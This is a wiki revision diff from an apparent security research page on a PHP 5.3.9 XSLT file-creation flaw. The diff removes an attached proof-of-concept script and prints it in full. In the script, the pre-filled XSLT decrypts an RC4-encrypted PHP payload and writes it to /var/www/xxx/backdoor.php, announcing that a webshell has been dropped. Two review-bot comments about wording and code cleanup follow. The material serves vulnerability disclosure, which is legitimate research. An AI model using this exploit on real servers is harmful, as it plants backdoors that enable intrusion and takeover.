Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version 17.1
edited by Nicolas Gregoire
on 2012/01/16 11:39
Change comment: There is no comment for this version
To version 15.1
edited by Nicolas Gregoire
on 2012/01/16 11:37
Change comment: There is no comment for this version

Details

Page properties
Content
... ... @@ -14,7 +14,7 @@
14 14  
15 15  == PoC with crypto ==
16 16  
17 -A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script ([[attach:php539-xslt.php]]) will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php".
17 +A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php".
18 18  
19 19  = Executing PHP code =
20 20  
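Review bot: removing the `[[attach:php539-xslt.php]]` link in the new line 17 leaves "This PHP script" without a referent, because the same change also deletes the attachment itself (see the `php539-xslt.php` hunks below). Either point the sentence at the OSS-Security post that carries the script, e.g. "The PHP script posted there will by default display ...", or keep a link to wherever the file now lives, so readers of the text can still find the script the paragraph describes.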
php539-xslt.php
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -2.0 KB
Content
... ... @@ -1,68 +1,0 @@
1 -
2 -<?php
3 -
4 -// Get parameters
5 -$action = $_POST['action'];
6 -$xml = $_POST['xml'];
7 -$xsl = $_POST['xsl'];
8 -
9 -print "<html><body>";
10 -if ($action == "transform") {
11 -
12 - print "<h2>Ready to transform ...</h2><br/>";
13 -
14 - # LOAD XML FILE
15 - $xmldom = new DOMDocument();
16 - print "XML: <pre>".htmlentities($xml)."</pre><br/>";
17 - $xmldom->loadXML($xml);
18 -
19 - # LOAD XSLT FILE
20 - $xsldom = new DOMDocument();
21 - print "XSL: <pre>".htmlentities($xsl)."</pre><br/>";
22 - $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted !
23 -
24 - # START XSLT
25 - $xslproc = new XSLTProcessor();
26 - $xslproc->importStylesheet($xsldom);
27 -
28 - # TRANSFORM & PRINT
29 - $output = $xslproc->transformToXML($xmldom); // File creation !
30 - print "Output: <pre>".htmlentities($output)."</pre><br/>";
31 -
32 -} else {
33 -
34 - # DISPLAY A PRE-FILLED FORM
35 - print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>";
36 - print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>";
37 - print "<form method='post'>";
38 - print "XML document:<br/>";
39 - print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>";
40 - print "XSLT code:<br/>";
41 - print "<textarea name='xsl' rows='20' cols='130'>";
42 -print <<<XSLT
43 -<xsl:stylesheet
44 - version="1.0"
45 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
46 - xmlns:cry="http://exslt.org/crypto"
47 - xmlns:sax="http://icl.com/saxon"
48 - extension-element-prefixes="cry sax">
49 -
50 - <xsl:template match="/">
51 - <sax:output href="/var/www/xxx/backdoor.php" method="text">
52 - <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/>
53 - </sax:output>
54 - <xsl:text>A webshell have been dropped</xsl:text>
55 - </xsl:template>
56 -
57 -</xsl:stylesheet>
58 -XSLT;
59 - print "</textarea><br/><br/>";
60 - print "<input type='hidden' name='action' value='transform'/>";
61 - print "<input type='submit'/></form>";
62 -
63 -}
64 -print "</body></html>";
65 -
66 -?>
67 -
68 -
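Review bot: the comment on removed line 22, `// Content of $xXsl may be untrusted !`, names a variable `$xXsl` that does not exist; the untrusted value loaded there is `$xsl`, read from `$_POST['xsl']` on line 7. If the attachment is ever restored, fix that name, guard the three `$_POST` reads on lines 5-7 with `isset()` so that a plain GET of the page (which takes the `else` branch to show the form) does not raise undefined-index notices, and correct the grammar of the heredoc text on line 54 (`A webshell have been dropped` should read `has been`). The comment `// File creation !` on line 29 is the one line that tells a reader where the side effect of the user-supplied stylesheet happens; it is worth keeping as is.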